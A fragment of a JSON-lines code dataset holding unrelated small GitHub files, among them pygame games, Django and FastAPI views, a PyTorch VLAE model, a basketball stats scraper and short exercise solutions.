\"pthread\"]\n\n # TODO: to remove in conan v2 once cmake_find_package* generators removed\n self.cpp_info.names[\"pkg_config\"] = \"amqpcpp\"\n self.cpp_info.names[\"cmake_find_package\"] = \"amqpcpp\"\n self.cpp_info.names[\"cmake_find_package_multi\"] = \"amqpcpp\"\n self.cpp_info.build_modules[\"cmake_find_package\"] = [self._module_file_rel_path]\n self.cpp_info.build_modules[\"cmake_find_package_multi\"] = 
[self._module_file_rel_path]\n","repo_name":"orgTestCodacy11KRepos110MB/repo-4943-conan-center-index","sub_path":"recipes/amqp-cpp/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70718070767","text":"# Mario class (for player)\n\nimport pygame, constants, sprite\n\nclass Mario(pygame.sprite.Sprite):\n\n def __init__(self):\n\n # parent constructor\n super().__init__()\n\n \"\"\" Init constants and variables \"\"\"\n # States for Mario \n self.standing = self.big = True\n self.walking = self.running = self.jumping = self.highJumping = self.falling = self.crouching = self.small = False\n self.direction = \"R\"\n\n # sprite arrays (big and small Mario)\n self.bigR_frames = []\n self.bigL_frames = []\n\n self.smallR_frames = []\n self.smallL_frames = []\n\n # frame constants (for big Mario)\n self.turnFrame = 4\n self.jumpFrame = 5\n self.crouchFrame = 6\n self.moveFrame = 3\n \n # frame vars for animation and timer\n self.frames = self.bigR_frames # current set of frames to be using\n self.curFrame = 0\n self.timer = 0\n\n \"\"\" Load images from sprite sheet\"\"\" \n\n # Big Mario\n\n # load sprite sheet\n self.sprite = pygame.image.load(\"bigMario_blue.png\").convert() # sprite is attribute of this class constructor\n\n # add to right frames with loop\n frameCount = 0\n while frameCount < 6: # load each standing sprite\n image = sprite.get_image(self, frameCount*16, 0, 16, 28, constants.GREEN)\n self.bigR_frames.append(image)\n frameCount += 1\n\n # load crouch sprite\n image = sprite.get_image(self, frameCount*16, 10, 16, 18, constants.GREEN)\n self.bigR_frames.append(image) \n\n # add to left (just flip frames of right)\n for frame in self.bigR_frames:\n temp = pygame.transform.flip(frame, True, False)\n self.bigL_frames.append(temp)\n \n # set starting sprite\n self.image = self.bigR_frames[self.curFrame]\n\n # Set a referance to the image rect.\n self.rect = self.image.get_rect()\n \n # Set speed vector of player\n self.change_x = 0\n self.change_y = 0\n \n # List of sprites we can bump against\n self.level = None\n\n # update Mario\n def update(self):\n # Gravity\n self.calc_grav()\n\n # run only if on ground\n if self.running == True and self.jumping == False and self.crouching == False:\n self.walk()\n\n # see if running\n if abs(self.change_x) > 0 and not self.jumping:\n self.running = True\n self.standing = False\n\n else:\n self.running = False\n self.standing = True\n\n # Move left/right\n self.rect.x += self.change_x\n\n # See if we hit anything (x direction)\n block_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\n for block in block_hit_list:\n # If we are moving right,\n # set our right side to the left side of the item we hit\n if self.change_x > 0:\n self.rect.right = block.rect.left\n elif self.change_x < 0:\n # Otherwise if we are moving left, do the opposite.\n self.rect.left = block.rect.right\n \n # see if on ground\n if self.change_y == 0:\n self.jumping = False\n\n # display standing sprite\n if self.running == False and self.jumping == False:\n self.stand()\n\n # display standing sprite\n if self.crouching == True:\n self.crouch()\n self.rect.y += self.change_y\n\n else: # Move up/down\n self.rect.y += self.change_y\n\n if self.jumping:\n # determine what sprite to use for jumping\n if self.crouching:\n if self.direction == \"R\":\n self.image = self.bigR_frames[self.crouchFrame]\n else:\n 
self.image = self.bigL_frames[self.crouchFrame] \n\n elif self.direction == \"R\":\n self.image = self.bigR_frames[self.jumpFrame]\n else:\n self.image = self.bigL_frames[self.jumpFrame]\n \n # Check and see if we hit any platforms (y direction)\n block_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\n for block in block_hit_list:\n \n # Reset our position based on the top/bottom of the object.\n if self.change_y > 0:\n self.rect.bottom = block.rect.top\n self.jumping = False\n elif self.change_y < 0:\n self.rect.top = block.rect.bottom\n \n # Stop our vertical movement\n self.change_y = 0\n \n def calc_grav(self):\n \"\"\" Calculate effect of gravity. \"\"\"\n if self.change_y == 0:\n self.change_y = 1\n else:\n self.change_y += .35\n \n # See if we are on the ground\n if self.rect.y >= constants.SCREEN_HEIGHT - self.rect.height and self.change_y >= 0:\n self.change_y = 0\n self.rect.y = constants.SCREEN_HEIGHT - self.rect.height\n\n\n # standing function\n def stand(self):\n self.frames = self.decideFrames()\n self.image = self.frames[0]\n\n # running function\n def walk(self):\n # change frame based on direction\n self.frames = self.decideFrames()\n\n # control animation speed with timer and frame direction\n self.timer += 1\n\n if self.timer % 4 == 0:\n self.curFrame += 1\n\n print (self.curFrame)\n\n # see if move frame limit (3) reached for either direction\n if self.curFrame > self.moveFrame:\n self.curFrame = 0\n\n self.image = self.frames[self.curFrame]\n\n def jump(self):\n\n # move up 2 pixels for start of jump\n self.jumping = True\n self.rect.y += 2\n\n # add platforms to list to check if open space above and end first part of jump\n platform_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\n self.rect.y -= 2\n \n # if no platforms hit, jump up\n if len(platform_hit_list) > 0 or self.rect.bottom >= constants.SCREEN_HEIGHT:\n self.change_y = -10\n \n # Player-controlled movement:\n def go_left(self):\n \"\"\" Called when the user hits the left arrow. \"\"\"\n self.direction = \"L\"\n self.running = True\n while self.change_x > -4:\n self.change_x -= .1\n\n\n def go_right(self):\n \"\"\" Called when the user hits the right arrow. \"\"\"\n self.direction = \"R\"\n self.running = True\n while self.change_x < 4:\n self.change_x += .1\n\n \n def stop(self):\n \"\"\" Called when the user lets off the keyboard. 
\"\"\"\n self.running = False\n self.change_x = 0\n\n def crouch(self):\n # crouch based on direction\n if self.direction == \"R\":\n self.image = self.bigR_frames[self.crouchFrame]\n else:\n self.image = self.bigL_frames[self.crouchFrame]\n\n self.change_y += 20\n\n # function that decides what frames to be using for anything\n def decideFrames(self):\n # check based on direction and size\n if self.direction == \"R\":\n if self.big == True:\n return self.bigR_frames\n else:\n return self.smallR_frames\n\n else:\n if self.big == True:\n return self.bigL_frames\n else:\n return self.smallL_frames\n\n\n","repo_name":"ItsArmin/MarioGame","sub_path":"mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"10138007815","text":"from Clases.Persona import Persona\nfrom Clases.Agenda import Agenda\n\nmanuel = Persona(\"Manuel\", \"Rojas\", \"manuel@sucorreo.cl\") #Instanciar un objeto\nmanuel.apellidos = \"Rojas Olivares\"\nmanuel.edad = 10\nmanuel.mostrar()\nmanuel.caminar(29)\nmanuel.caminar(50)\n\nprint('Crear agenda y agregar contacto')\nmiagenda = Agenda()\nmiagenda.AgregarPersona(manuel)\nmiagenda.MostrarMisContactos()\n\nprint('Agregar nuevo contacto a la agenda')\npablo = Persona(\"Pablo\", \"Godoy\", \"pablo@sucorreo.cl\")\nmiagenda.AgregarPersona(pablo)\nmiagenda.MostrarMisContactos()\n\nprint('Buscar contacto por email: manuel@sucorreo.cl')\nmiagenda.BuscarPorEmail(\"manuel@sucorreo.cl\")\n\nprint('Elminar contacto por su email: manuel@sucorreo.cl')\nmiagenda.EliminarPorEmail(\"manuel@sucorreo.cl\")\n\nprint('Mostrar contenido de la agenda')\nmiagenda.MostrarMisContactos()\n\nprint('Este es mi programa principal')","repo_name":"bastianms/nsideas.PythonTests","sub_path":"clinica/ejemploClase/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"40298648189","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\nfrom .models import Contact\n\ndef contact(request):\n if request.method == 'POST':\n offering_id = request.POST['offering_id']\n offering = request.POST['offering']\n name = request.POST['name']\n email = request.POST['email']\n phone = request.POST['phone']\n message = request.POST['message']\n user_id = request.POST['user_id']\n affiliate_email = request.POST['affiliate_email']\n\n # Check if user has made inquiry already\n if request.user.is_authenticated:\n user_id = request.user.id\n has_contacted = Contact.objects.all().filter(offering_id=offering_id, user_id=user_id)\n if has_contacted:\n messages.error(request, 'You have already made an inquiry for this offering')\n return redirect('/offerings/'+offering_id)\n\n contact = Contact(offering=offering, offering_id=offering_id, name=name, email=email, phone=phone, message=message, user_id=user_id )\n\n contact.save()\n\n #send email\n send_mail(\n 'Investment Offering Inquiry',\n 'There has been an inquiry for ' + offering + '. 
Sign into the admin panel for more info.',\n            'wealthyalchemy@gmail.com',\n            [affiliate_email],\n            fail_silently=False\n        )\n\n        messages.success(request, 'Your request has been submitted, an affiliate will get back to you soon')\n        return redirect('/offerings/'+offering_id)","repo_name":"Anthony-Mendola/WealthAlchemy","sub_path":"contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"20080202176","text":"\"\"\"\n Pygame base template for opening a window\n\n Sample Python/Pygame Programs\n Simpson College Computer Science\n http://programarcadegames.com/\n http://simpson.edu/computer-science/\n\n Explanation video: http://youtu.be/vRB_983kUMc\n\"\"\"\n\nimport pygame\nimport random\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nGREY = (127, 127, 127)\nLIYA = (150,180,250)\nSEE = (180,220,180)\nKV = (34,134,23)\nOW = (173,27,95)\nSK=(89,162,237)\n\n\npygame.init()\n\n\n\n\n# Set the width and height of the screen [width, height]\nSCREEN_WIDTH = 700\nSCREEN_HEIGHT = 500\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\npygame.display.set_caption(\"Ball Game\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n\n\npossible_ball_colors = [BLACK, WHITE, GREEN, RED, BLUE, GREY, LIYA, KV, OW, SK]\n\n\n# Ball 1\nx_speed = random.randint(-10, 10)\ny_speed = random.randint(-10, 10)\n\nx_location = int(SCREEN_WIDTH/2)\ny_location = int(SCREEN_HEIGHT/2)\n\nball_size = random.randint(10, 30)\n\n# Ball 2\nXSPEED=3\nYSPEED=3\nSIZE=30\nL=SIZE\nXC=int(SCREEN_WIDTH/2)\nYC=int(SCREEN_HEIGHT/2)\ncolor=[BLACK,WHITE,GREEN,RED,BLUE,GREY,LIYA,KV,OW,SK]\nindex=6\n\n\n# -------- Main Program Loop -----------\nwhile not done:\n    # --- Main event loop\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            done = True\n\n\n    # --- Game logic should go here\n\n    XC+=XSPEED\n    YC+=YSPEED\n\n    # --- Screen-clearing code goes here\n\n    # Here, we clear the screen to white. 
Don't put other drawing commands\n # above this, or they will be erased with this command.\n\n # If you want a background image, replace this clear with blit'ing the\n # background image.\n screen.fill(SEE)\n\n # --- Drawing code should go here\n ball_color = random.choice(possible_ball_colors) # This is outside because of variable scoping.\n\n\n # Ball 1 \n pygame.draw.circle(screen, ball_color, [x_location, y_location], ball_size)\n\n\n if x_location >= SCREEN_WIDTH - ball_size or x_location < ball_size:\n x_speed = x_speed * -1\n\n if y_location >= SCREEN_HEIGHT - ball_size or y_location < ball_size:\n y_speed = y_speed * -1\n\n\n x_location += x_speed\n y_location += y_speed\n\n #Ball 2\n\n pygame.draw.circle(screen,color[index],[XC,YC],SIZE)\n if XC>=SCREEN_WIDTH-L or XC<=L:\n XSPEED=-XSPEED\n index=random.randint(0,6)\n SIZE=random.randint(20,80)\n if YC>=SCREEN_HEIGHT-L or YC<=L:\n YSPEED=-YSPEED \n index=random.randint(0,6)\n SIZE=random.randint(20,80)\n\n\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n\n # --- Limit to 60 frames per second\n clock.tick(60)\n\n# Close the window and quit.\npygame.quit()\nexit() # Needed when using IDLE\n","repo_name":"ZhuLiya/2016SIP","sub_path":"week3/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25390415413","text":"# -*- coding: utf-8 -*-\nimport os, datetime, md5\nfrom django import http\nfrom django.conf import settings\nfrom django.views.generic.simple import direct_to_template\nfrom pytils.translit import translify\nfrom django.views.decorators.csrf import csrf_exempt\n\ntry:\n from PIL import Image\nexcept ImportError:\n import Image\nfrom django.contrib.auth.decorators import login_required\nfrom apps.utils.utils import crop_image\nfrom django.db.models import get_model\nfrom decimal import Decimal\nfrom urllib2 import urlopen\nfrom pytils.translit import slugify\nfrom django.core.files import File\nfrom django.core.files.temp import NamedTemporaryFile\nfrom xml.dom.minidom import *\nfrom apps.products.models import Category, Product, FeatureValue\n\ndef handle_uploaded_file(f, filename, folder):\n name, ext = os.path.splitext(translify(filename).replace(' ', '_'))\n hashed_name = md5.md5(name + datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")).hexdigest()\n path_name = settings.MEDIA_ROOT + '/uploads/' + folder + hashed_name + ext\n destination = open(path_name, 'wb+')\n\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n return '/media/uploads/' + folder + hashed_name + ext\n\n\n@csrf_exempt\ndef upload_img(request):\n if request.user.is_staff:\n if request.method == 'POST':\n url = handle_uploaded_file(request.FILES['file'], request.FILES['file'].name, 'images/')\n\n #Resizing\n size = 650, 650\n im = Image.open(settings.ROOT_PATH + url)\n imageSize = im.size\n if (imageSize[0] > size[0]) or (imageSize[1] > size[1]):\n im.thumbnail(size, Image.ANTIALIAS)\n im.save(settings.ROOT_PATH + url, \"JPEG\", quality=100)\n return http.HttpResponse('{\"filelink\":\"%s\"}' % url)\n\n else:\n return http.HttpResponse('error')\n else:\n return http.HttpResponse('403 Forbidden. 
Authentication Required!')\n\n\n@csrf_exempt\ndef upload_file(request):\n if request.user.is_staff:\n if request.method == 'POST':\n url = handle_uploaded_file(request.FILES['file'], request.FILES['file'].name, 'files/')\n url = '{\"filelink\":\"%s\",\"filename\":\"%s\"}' % (url, request.FILES['file'].name)\n return http.HttpResponse(url)\n else:\n return http.HttpResponse('403 Forbidden. Authentication Required!')\n\n\n@login_required()\n@csrf_exempt\ndef crop_image_view(request, app_name, model_name, id):\n model = get_model(app_name, model_name)\n output_size = model.crop_size\n if request.method != \"POST\":\n try:\n image = model.objects.get(pk=id).image\n return direct_to_template(request, 'admin/crop_image.html', locals())\n except model.DoesNotExist:\n raise http.Http404('Object not found')\n else:\n original_img = model.objects.get(pk=id)\n crop_image(request.POST, original_img, output_size)\n\n next = request.path.replace('crop/', '')\n return http.HttpResponseRedirect(next)\n\n\ndef upload_xml(request):\n if request.user.is_staff:\n if request.method == 'POST':\n f = request.FILES['file']\n filename = request.FILES['file'].name\n name, ext = os.path.splitext(translify(filename).replace(' ', '_'))\n newname = '/uploads/' + 'xml_tmp' + ext\n if ext == '.xsql' or ext == '.xml':\n # удаляем старый файл\n oldfile = 'xml_tmp'\n for root, dirs, files in os.walk(settings.MEDIA_ROOT + '/uploads/', ):\n for filename in files:\n name, ext = os.path.splitext(translify(u'%s' % filename).replace(' ', '_'))\n if name == 'xml_tmp':\n oldfile = '/uploads/' + filename\n try:\n os.remove(settings.MEDIA_ROOT + oldfile)\n except OSError:\n oldfile = False\n # загружаем новый\n path_name = settings.MEDIA_ROOT + newname\n destination = open(path_name, 'wb+')\n for chunk in f.chunks():\n destination.write(chunk)\n destination.close()\n\n # распарсиваем:\n f = parse(path_name)\n\n rows_array = f.getElementsByTagName('product')\n all_products = Product.objects.all()\n parsed = ''\n if rows_array: # если есть элемент ROW - то проверяем что пришло - товар или категория\n for z in rows_array:\n xml_code = z.getElementsByTagName('code')[0].firstChild.nodeValue\n try:\n xml_art = z.getElementsByTagName('art')[0].firstChild.nodeValue\n except:\n xml_art = u''\n xml_title = z.getElementsByTagName('title')[0].firstChild.nodeValue\n try:\n xml_price = Decimal(z.getElementsByTagName('price')[0].firstChild.nodeValue)\n except:\n xml_price = 0\n try:\n xml_remainder = Decimal(z.getElementsByTagName('remainder')[0].firstChild.nodeValue)\n except:\n xml_remainder = 0\n\n try:\n change = False\n product = all_products.get(xml_id=xml_code)\n if product.art != xml_art:\n product.art = xml_art\n change = True\n if product.title != xml_title:\n product.title = xml_title\n change = True\n if product.price != xml_price:\n product.price = xml_price\n change = True\n if product.remainder != xml_remainder:\n product.remainder = xml_remainder\n change = True\n if change:\n product.save()\n except:\n product = Product(title=xml_title, art=xml_art, price=xml_price, xml_id=xml_code,\n remainder=xml_remainder)\n product.save()\n\n return http.HttpResponseRedirect('/admin/products/product/?')\n else:\n return http.HttpResponseRedirect('/admin/')\n else:\n return http.HttpResponseRedirect('/admin/')\n else:\n return http.HttpResponse('403 Forbidden. 
Authentication Required!')","repo_name":"wd5/2-slon-dragon","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"42726365119","text":"N, K = list(map(int, input().split()))\nAttack = dict()\nDefense = dict()\nHealth = dict()\nn = 0\nfor i in range(N):\n\tA, D, H = list(map(int, input().split()))\n\tAttack[A] = n\n\tDefense[D] = n\n\tHealth[H] = n\n\tn += 1\n\nAttack = sorted(Attack.items())\nDefense = sorted(Defense.items())\nHealth = sorted(Health.items())\nAttack.reverse()\nDefense.reverse()\nHealth.reverse()\n\ns = set()\nfor i in range(K):\n\ts.add(Attack[i][1])\n\ts.add(Defense[i][1])\n\ts.add(Health[i][1])\nprint(len(s))","repo_name":"Weiguo-Jiang/Kattis-Solutions","sub_path":"iwannabe.py","file_name":"iwannabe.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
{"seq_id":"16261171343","text":"'''\nАвтомат обрабатывает натуральное число N < 256 по следующему алгоритму:\n1) Строится восьмибитная двоичная запись числа N.\n2) Инвертируются все разряды исходного числа, кроме последней единицы и стоящих за ней нулей (0 заменяется на 1, 1 на 0).\n3) Полученное число переводится в десятичную систему счисления.\nДля какого значения N результат работы алгоритма равен 221?\n'''\nfor n in range(1, 256):\n    s = bin(n)[2:]\n    s = (8 - len(s)) * '0' + s\n    s1 = ''\n    i = 0\n    for x in range(len(s)):\n        if s[x] == '1':\n            i += 1\n        if i == s.count('1'):\n            i = x\n    for x in range(0, i):\n        if s[x] == '1':\n            s1 += '0'\n        if s[x] == '0':\n            s1 += '1'\n    for x in range(i, len(s)):\n        s1 += s[x]\n    if int(s1, 2) == 221:\n        print(n)\n","repo_name":"plugarivan/ege_informatika_python","sub_path":"zadanie_5/5-26.py","file_name":"5-26.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"ru","doc_type":"code","stars":27,"dataset":"github-code","pt":"2"}
{"seq_id":"23404520141","text":"from torch.distributions.multivariate_normal import MultivariateNormal\n\nfrom pdb import set_trace as st\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.distributions import Normal\nimport torch.utils.data as data\nimport math\n\n\ndef quantize(x, n_bit):\n    x = x * 0.5 + 0.5 # to [0, 1]\n    x *= 2 ** n_bit - 1 # [0, 255] \n    x = torch.floor(x + 1e-4) # [0, 255]\n    return x\n\n\nclass Encoder(nn.Module):\n    def __init__(self, z_dim, channel_dim):\n        super().__init__()\n        self.z_dim = z_dim\n        self.model = nn.Sequential(\n            nn.Conv2d(channel_dim, 32, 3, 1, 1),\n            nn.LeakyReLU(0.2, True),\n            nn.Conv2d(32, 64, 3, 2, 1),\n            nn.LeakyReLU(0.2, True),\n            nn.Conv2d(64, 128, 3, 2, 1),\n            nn.LeakyReLU(0.2, True),\n            nn.Conv2d(128, 256, 3, 2, 1),\n            nn.LeakyReLU(0.2, True),\n        )\n        self.out = nn.Linear(256 * 4 * 4, z_dim)\n        self.made = MADE((z_dim//2,), 2, hidden_size=[512, 512])\n        self.prior = torch.distributions.Normal(torch.tensor(0.).cuda(), torch.tensor(1.).cuda())\n\n    def forward(self, x):\n        x = x.float()\n        x = self.model(x)\n        x = x.view(x.shape[0], -1)\n        z = self.out(x)\n        return z\n\n    def reverse(self, epis):\n        m = self.made(epis)\n        mu, log_sigma = m[:, 0], m[:, 1]\n        zs = (epis - mu) * torch.exp(-log_sigma)\n        return zs\n\n\nclass Decoder(nn.Module):\n\n    def __init__(self, z_dim, channel_dim):\n        super().__init__()\n        self.z_dim = z_dim\n        self.channel_dim = channel_dim\n\n        self.linear = nn.Linear(z_dim, 4 * 4 * 128)\n        self.main = nn.Sequential(\n            nn.ConvTranspose2d(128, 128, 
4, 2, 1),\n nn.LeakyReLU(0.2, True),\n nn.ConvTranspose2d(128, 64, 4, 2, 1),\n nn.LeakyReLU(0.2, True),\n nn.ConvTranspose2d(64, 32, 4, 2, 1),\n nn.LeakyReLU(0.2, True),\n nn.Conv2d(32, 3, 3, 1, 1),\n )\n\n def forward(self, z):\n z = z.float()\n # x = nn.ReLU()(self.linear(z))\n x = self.linear(z)\n x = x.view(-1, 128, 4, 4) \n output = self.main(x) #[128, 3, 32, 32]\n output = torch.tanh(output)\n return output\n\n\nclass VLAE(nn.Module):\n def __init__(self, z_dim, channel_dim):\n super().__init__()\n self.encoder = Encoder(2 * z_dim, channel_dim)\n self.decoder = Decoder(z_dim, channel_dim)\n self.z_dim = z_dim\n\n def loss(self, x):\n z = self.encoder(x)\n mu, log_sigma = z.chunk(2, dim=1)\n z = torch.randn_like(mu) * torch.exp(log_sigma) + mu\n m = self.encoder.made(z)\n epis_mu, epis_log_sigma = m[:, 0], m[:, 1]\n epis = z * torch.exp(epis_log_sigma) + epis_mu #[128, 32]\n recon = self.decoder(z)\n recon_loss = ((recon-x)**2).mean(dim = 0).sum()\n\n log_p_z = epis_log_sigma.mean(dim = 0).sum() + self.encoder.prior.log_prob(epis).mean(dim = 0).sum()\n log_q_z = Normal(mu, torch.exp(log_sigma)).log_prob(z).mean(dim = 0).sum()\n kl_loss = (log_q_z - log_p_z)\n return recon_loss + kl_loss, recon_loss, kl_loss\n\n def sample(self, num, z_dim):\n epis = np.random.normal(0, 1, num * z_dim)\n epis = epis.reshape((num, z_dim))\n epis = torch.from_numpy(epis).cuda().float()\n zs = self.encoder.reverse(epis)\n pred = self.decoder(zs)\n pred = quantize(pred, 8).detach().cpu().numpy()\n return pred.astype(int)\n\n def reconstruct(self, x):\n z = self.encoder(x)\n mu, log_sigma = z.chunk(2, dim=1)\n z = torch.randn_like(mu) * (log_sigma).exp() + mu\n recon = self.decoder(z)\n recon = quantize(recon, 8).detach().cpu().numpy()\n return recon\n\n def interp(self, samples1, samples2):\n z1 = self.encoder(samples1)\n mu, log_sigma = z1.chunk(2, dim=1)\n z1 = torch.randn_like(mu) * (log_sigma).exp() + mu\n z2 = self.encoder(samples2)\n mu, log_sigma = z2.chunk(2, dim=1)\n z2 = torch.randn_like(mu) * (log_sigma).exp() + mu\n to_invert = torch.zeros(samples1.shape[0], 10, *samples1.shape[1:])\n alphas = np.arange(10)/10\n for a in range(10):\n interp = alphas[a]\n z = interp * z1 + (1-interp) * z2\n x = self.decoder(z)\n to_invert[:, a] = x\n result = to_invert.view(10 * len(samples1), *samples1.shape[1:])\n return quantize(result, 8).detach().cpu().numpy()\n\ndef preprocess(data):\n data = data.astype(float)\n rand = np.random.uniform(0, 1, data.shape) \n data += rand #[0, 256]\n data = data/128 #[0, 2]\n data -= 1 #[-1, 1]\n return data \n\ndef normalize(data):\n return (225 * (data-data.min())/(data.max() - data.min())).astype(int)\n\n","repo_name":"WMViolet/Course-Projects","sub_path":"deep_unsupervised_learning/vlae.py","file_name":"vlae.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11444594706","text":"from fastapi import APIRouter, Depends, HTTPException\nfrom sqlalchemy.orm import Session\nfrom starlette import status\nfrom typing import List\nfrom database import get_db\nfrom models import Program, VCAC\nfrom domain.program import program_schema, program_crud\nfrom domain.vcac.vcac_router import get_current_vcac\n\nrouter = APIRouter(\n prefix=\"/program\"\n)\n\n\n@router.post(\"/\")\ndef program_create(\n _program_create: program_schema.ProgramBase,\n db: Session = Depends(get_db),\n current_user: VCAC = Depends(get_current_vcac)\n):\n #\n program_crud.create_program(\n db, 
_program_create, current_user\n )\n\n\n@router.put(\"/\", status_code=status.HTTP_204_NO_CONTENT)\ndef program_update(_program_update: program_schema.ProgramBase,\n db: Session = Depends(get_db),\n current_user: VCAC = Depends(get_current_vcac)):\n program_crud.update_program(\n db=db,\n program_update=_program_update,\n vcac=current_user\n )\n\n\n@router.get(\"/list\", response_model=List[program_schema.ProgramBase])\ndef program_list(\n db: Session = Depends(get_db),\n):\n return program_crud.read_program_list(db)\n\n\n@router.get(\"/{title}\", response_model=program_schema.ProgramBase)\ndef program_read(title: str, db: Session = Depends(get_db)):\n return program_crud.read_program(\n db,\n title=title\n )\n\n\n@router.delete(\"/{title}\", status_code=status.HTTP_204_NO_CONTENT)\ndef program_delete(title: str,\n db: Session = Depends(get_db),\n current_user: VCAC = Depends(get_current_vcac)):\n program_crud.delete_program(\n db=db,\n title=title,\n vcac=current_user\n )\n\n","repo_name":"SPARCS-2023-StartUp-Hackathon-4/flit-backend-vcac","sub_path":"app/domain/program/program_router.py","file_name":"program_router.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12357126094","text":"from bs4 import BeautifulSoup\nfrom collections import Iterator\nimport sys, requests, time, pickle, bs4, re\nimport crawler as c\n\nstart_url = \"https://www.sports-reference.com/cbb/seasons/2018.html\"\nroot_url = 'https://www.sports-reference.com/'\n\ndef load_team_list():\n team_list = []\n with open('TournTeams.txt', 'r') as teams:\n for team in teams:\n team_list.append(team.rstrip())\n return team_list\n\ndef pull_team_data(row):\n WL = row.find('td', {'data-stat': 'win_loss_pct'}).text\n PPG = row.find('td', {'data-stat': 'pts_per_g'}).text\n OPG = row.find('td', {'data-stat': 'opp_pts_per_g'}).text\n SOS = row.find('td', {'data-stat': 'sos'}).text\n return {'Win-Loss': WL, 'pts_per_g': PPG, 'opp_pts_per_g': OPG, 'Str_of-Sched': SOS}\n\ndef search_for_team(soup, teams):\n schools = soup.find('table', {'id': 'standings'})\n rows = schools.find_all('tr')\n conf_data = []\n for row in rows:\n try:\n school = row.find('td',{'data-stat': 'school_name'})\n school_name = school.find('a').text\n if school_name in teams:\n team_data = pull_team_data(row)\n conf_data.append((school_name, team_data))\n except AttributeError as e:\n continue\n return conf_data\n \n\ndef main():\n root_res = c.get_html(start_url)\n root_soup = c.make_soup(root_res)\n confs = c.parse_for_links(root_soup,1)\n teams = load_team_list()\n data_2018 = []\n for conf in confs:\n print(conf)\n conf_res = c.get_html(conf)\n conf_soup = c.make_soup(conf_res)\n data_2018 += search_for_team(conf_soup, teams)\n print(len(data_2018))\n print(data_2018)\n with open('./pickles/2018.pickle', 'wb') as pickle_2018:\n pickle.dump(data_2018, pickle_2018)\n \n \nmain()","repo_name":"livinlefevreloca/cbb_crawler","sub_path":"scraping/2018.py","file_name":"2018.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31167951776","text":"# External Imports\nimport logging\nfrom flask import (\n current_app as app,\n Blueprint,\n jsonify,\n request\n)\nfrom flask_jwt_extended import (\n jwt_required\n)\n\n# Local Imports\nfrom utils.system import (\n status\n)\n\n# Blueprint Setup\nsystem_api_bp = Blueprint(\n \"system_api_bp\",\n __name__,\n 
url_prefix='/api/v1.0/system'\n)\n\n@system_api_bp.route(\"/status\", methods=[\"POST\"])\n@jwt_required()\ndef unseal():\n \"\"\"\n System status\n \n Returns:\n Flask Response: Flask Response Object\n \"\"\"\n # Get system data\n data=status(app)\n # Check if data is empty\n if not data:\n return jsonify(\n status=\"error\",\n message=\"No system data found\"\n ), 404\n # Return data\n return jsonify(\n status=\"ok\",\n data=data\n ), 200\n","repo_name":"ankraio/docs-flask","sub_path":"src/system/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"32784278447","text":"#!/usr/bin/env python3\n\n#time: frequency parser\n\nimport sys\n\naubio_freq_output = sys.argv[1]\n\nfreq_dict = {}\n\nwith open('classicalfreq.txt','r') as file_obj:\n for line in file_obj:\n line = line.rstrip()\n line_split = line.split()\n time = line_split[0]\n frequency = line_split[1]\n freq_dict[time] = frequency\n\n print(freq_dict)\n","repo_name":"nomascus/DJMM","sub_path":"freq_parser.py","file_name":"freq_parser.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24949691197","text":"#!/usr/bin/env python3\nimport zlib\nimport KWH_MySQL\nimport socket\nimport sys\nsys.path.append('/kwh/lib')\n\n# load config variables from kwh.config table\nexec(open(\"/kwh/config/get_config.py\").read())\nDEBUG = int(config_var['DEBUG'])\n\n# Grab up to 100 tx_strings and tx them\nDB = KWH_MySQL.KWH_MySQL()\nrecords = DB.SELECT(\"SELECT * FROM tx_string LIMIT 100;\")\n\nfor row in records:\n if config_var['COMPRESS'] == \"1\":\n bytedata = bytearray()\n bytedata = zlib.compress(row[1], 6)\n\n server = socket.socket(socket.AF_INET, 